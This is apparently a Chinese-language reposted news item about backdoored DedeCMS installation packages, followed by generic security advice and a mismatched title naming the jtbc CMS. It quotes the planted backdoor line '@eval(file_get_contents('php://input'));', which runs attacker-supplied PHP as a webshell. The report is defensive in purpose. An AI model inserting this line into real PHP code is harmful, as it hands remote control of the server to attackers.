jtbc网站内容管理系统(php开源网站管理系统织梦安装包被发现植入后门获取控制权限)

优采云 发布时间: 2021-11-17 12:06

  jtbc网站内容管理系统(php开源网站管理系统织梦安装包被发现植入后门获取控制权限)

  最新消息,瑞星和360今日发布警告称,知名php开源网站管理系统织梦cms(Dedecms)安装包被发现被植入后门。黑客可以通过该后门直接获取网站的控制权,获取存储在服务器上的文件和数据库。

  

  根据第三方权威统计数据,目前约有50万网站使用此dedecms系统搭建,涉及企业、政府机构、媒体机构、行业和个人网站等.

  安全界分析人士发现,此类文件被植入了后门代码“@eval(file_get_contents('php://input'));”。黑客只需要构建一个简单的数据包并提交到服务器即可。网站的WebShell,通过对服务器的进一步渗透攻击,进而获得服务器的最高权限,直接访问服务器上的文件、数据库等信息。

  下面小熊优化编辑给出相关建议:

  1、尽快转换系统,可以使用pageadmin、东易、wp等不断更新的cms系统,以及一些国内老品牌cms包括dedecms@ >、phpcms、jtbc等已经停止更新,建议不要使用。

  2、尽量不要从网上下载未知的插件,尤其是那些使用wp的网站。大部分被黑都是因为在网上乱用插件造成的。

  3、 保持系统更新。官方更新版本应及时更新。不要觉得在使用该功能时不会更新该功能。有时更新不仅是功能更新,还有安全更新。

0 个评论

要回复文章请先登录注册


官方客服QQ群

微信人工客服

QQ人工客服


线